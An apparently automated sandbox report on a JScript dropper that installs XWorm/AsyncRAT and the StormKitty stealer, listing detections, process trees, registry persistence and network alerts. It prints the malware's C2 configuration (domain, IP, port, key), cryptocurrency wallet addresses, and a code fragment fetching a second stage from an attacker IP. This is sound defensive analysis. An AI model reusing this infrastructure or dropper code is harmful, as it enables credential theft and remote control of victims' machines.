Windows Analysis Report
ORDER-24930-067548.js

Overview

General Information

Sample name: ORDER-24930-067548.js
Analysis ID: 1523152
MD5: 8fbf57ab035ec7063b9522e5f30a75f7
SHA1: cd761463221ba82f46b2b28fe56a0e74588c64b9
SHA256: ff84d777db298c70e206a94f1a4a1a5d5536d8cd42eedbd50ffde364daa368a6
Tags: AsyncRAT, js, RAT, user-abuse_ch

Detection

StormKitty, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected XWorm
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5672 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3272 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • GeUT.exe (PID: 3120 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
        • GeUT.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 3672 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5812 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6764 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • Service.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 2772 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4620 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4152 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 3040 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • WMIADAP.exe (PID: 3772 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • Service.exe (PID: 5384 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 3184 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1344 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1656 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • cleanup
{"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
Source | Rule | Description | Author | Strings
00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x97ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9889:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x999e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8ff0:$cnc4: POST / HTTP/1.1
00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x55d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x60fc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6c224:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x77b80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x55e21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x61065:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6c2c1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x77c1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x55f36:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6117a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6c3d6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x77d32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x55588:$cnc4: POST / HTTP/1.1
  • 0x607cc:$cnc4: POST / HTTP/1.1
  • 0x6ba28:$cnc4: POST / HTTP/1.1
  • 0x77384:$cnc4: POST / HTTP/1.1
00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security

Source | Rule | Description | Author | Strings
13.2.Service.exe.2e1383c.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
13.2.Service.exe.2e1383c.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7bec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7c89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7d9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x73f0:$cnc4: POST / HTTP/1.1
13.2.Service.exe.2dfd39c.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
13.2.Service.exe.2dfd39c.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7bec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7c89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7d9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x73f0:$cnc4: POST / HTTP/1.1
13.2.Service.exe.2e085e0.4.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

              System Summary

Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , ProcessId: 3272, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , ProcessId: 3272, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ProcessId: 5672, ProcessName: wscript.exe
Source: File created, Author: Tim Shelton, Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5672, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
Source: Network Connection, Author: frack113, Data: DestinationIp: 192.210.215.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5672, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49704
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ProcessId: 5672, ProcessName: wscript.exe

              AV Detection

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\OLWJMU.js, Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js, Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Roaming\Service.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
Source: ORDER-24930-067548.js, Virustotal: Detection: 30%
Source: ORDER-24930-067548.js, ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe, Joe Sandbox ML: detected
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: as525795.duckdns.org,194.37.97.150
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: 6980
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: <123456789>
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: <Xwormmm>
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: XWorm V5.3
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: adobe.exe
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, String decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 
00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 
00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Documents\desktop.ini

              Software Vulnerabilities

Source: ORDER-24930-067548.js, Argument value: ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo']
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Code function: 4x nop then jmp 07CB4676h, 5_2_07CB44E0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Code function: 4x nop then inc dword ptr [ebp-30h], 5_2_07CB6538
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Code function: 4x nop then inc dword ptr [ebp-30h], 5_2_07CB3BD0

              Networking

              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 194.37.97.150:6980 -> 192.168.2.8:49705
              Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 194.37.97.150:6980 -> 192.168.2.8:49705
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80
              Source: Malware configuration extractorURLs: as525795.duckdns.org
              Source: Malware configuration extractorURLs: 194.37.97.150
              Source: ORDER-24930-067548.js Argument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo']
              Source: global trafficTCP traffic: 192.168.2.8:49705 -> 194.37.97.150:6980
              Source: Joe Sandbox ViewIP Address: 192.210.215.11 192.210.215.11
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewASN Name: AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT
              Source: global trafficHTTP traffic detected: GET /zoom/cc.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 194.37.97.150
              Source: wscript.exe, 00000000.00000003.1467024468.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1475994870.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1465964784.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466406423.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.j
              Source: wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466568496.000002BDDF071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1463316845.000002BDE17D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.js
              Source: wscript.exe, 00000000.00000002.1473794151.000002BDDF0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466505372.000002BDDF0C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.11/zoom/cc.jst
              Source: GeUT.exe, 00000015.00000002.1819069957.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
